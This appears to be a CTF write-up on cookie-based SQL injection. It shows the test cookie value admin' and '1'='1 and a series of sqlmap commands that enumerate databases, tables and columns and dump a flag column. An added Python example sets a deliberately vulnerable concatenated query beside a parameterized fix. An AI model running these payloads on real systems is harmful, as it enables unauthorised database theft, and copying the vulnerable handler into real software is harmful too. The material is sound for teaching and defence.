Table of Contents
- sqlmap POST injection
- Cookie injection: dumping the database
POST injection
1. Verify that an injection exists
The normal request carries "Cookie: user=user"; after changing it to "Cookie: user=admin", the flag parameter appears in the POST response.
Test with Cookie: user=admin' and '1'='1: the page returns an error and does not echo the flag, which shows that an injection exists here.
2. Copy the POST request and save it as the file 1.txt
>> The injection here goes through the modified cookie, so cookie injection is looked at together with the principles of POST injection. In fact the two are combined in this case, but they are independent of each other.
Cookie injection
POST injection means injecting through the data sent in a POST request. Cookie injection means modifying the cookie information, either to disguise an identity or to use the cookie itself as the injection point.
1. Enumerate the databases
>sqlmap -r 1.txt --cookie="user=admin" -p user --level 2 --string="flag" --dbms=mysql --dbs
>> You can see there are four databases.
-r 1.txt: the saved POST request file; write the file's location here, for example /root/1.txt
Cookie to send: --cookie="user=admin"
--string parameter: specifies a string that the page contains when the result is true; a page that does not contain it is judged false. --string="flag" means the correct page echoes the word flag.
Specify the database type: --dbms=mysql
Enumerate the databases: --dbs
2. Enumerate the tables
>sqlmap -r 1.txt --cookie="user=admin" -p user --level 2 --string="flag" --dbms=mysql -D employee --tables
>> There are three tables under the employee database.
-D: the name of the specific database whose tables are enumerated
Enumerate the tables: --tables
The other parameters are unchanged.
3. Enumerate the columns of table fllaagg
>sqlmap -r 1.txt --cookie="user=admin" -p user --level 2 --string="flag" --dbms=mysql -D employee -T fllaagg --columns
To enumerate columns, specify the database and the table: -D database -T table
Enumerate the columns: --columns
4. Dump the fields in the table
>sqlmap -r 1.txt --cookie="user=admin" -p user --level 2 --string="flag" --dbms=mysql -D employee -T fllaagg -C "flag" --dump
>> The field is found to contain a flag.
To dump a field, specify the database, the table and the column: -D database -T table -C "column"
Dump the fields: --dump
The same method can be used to view the contents of the other databases and tables, and the injection point is handled the same way. Here the injection point is the modified cookie data in the request. If the POST data of the request is itself what is injected (plain POST injection), there is no need to add a cookie parameter such as --cookie="user=admin".
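
Why the cookie works as an injection point, and why the true/false page difference that --string="flag" relies on disappears once the value is bound as a parameter, shown as an added example that is not part of the original write-up. The handler, table, rows and page text are constructed assumptions, and sqlite3 stands in for MySQL so the code runs offline.

```python
import sqlite3

# Constructed stand-in for the challenge back end: sqlite3 replaces MySQL,
# and the table, rows and page text are assumptions, not taken from the target.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, role TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("admin", "administrator"), ("user", "guest")])
    return db

def parse_cookie(header):
    """Return the cookie pairs of a 'Cookie:' header value as a dict."""
    pairs = (item.split("=", 1) for item in header.split(";") if "=" in item)
    return {k.strip(): v.strip() for k, v in pairs}

def page_vulnerable(db, cookie_header):
    """Builds the query by string concatenation: the cookie is an injection point."""
    user = parse_cookie(cookie_header).get("user", "")
    sql = "SELECT role FROM users WHERE name = '" + user + "'"
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error:
        return "error"
    return "flag: welcome admin" if row and row[0] == "administrator" else "hello"

def page_hardened(db, cookie_header):
    """Binds the cookie as a parameter: it is compared as data, never parsed as SQL."""
    user = parse_cookie(cookie_header).get("user", "")
    row = db.execute("SELECT role FROM users WHERE name = ?", (user,)).fetchone()
    return "flag: welcome admin" if row and row[0] == "administrator" else "hello"

def oracle(page, db):
    """True when a true/false condition pair yields different pages (the --string signal)."""
    true_page = page(db, "user=admin' and '1'='1")
    false_page = page(db, "user=admin' and '1'='2")
    return ("flag" in true_page) != ("flag" in false_page)

if __name__ == "__main__":
    db = make_db()
    print("vulnerable handler leaks a boolean oracle:", oracle(page_vulnerable, db))
    print("hardened handler leaks a boolean oracle:", oracle(page_hardened, db))
```

With the bound parameter both test cookies are looked up as literal user names, so neither page contains flag and there is nothing for a boolean comparison to distinguish.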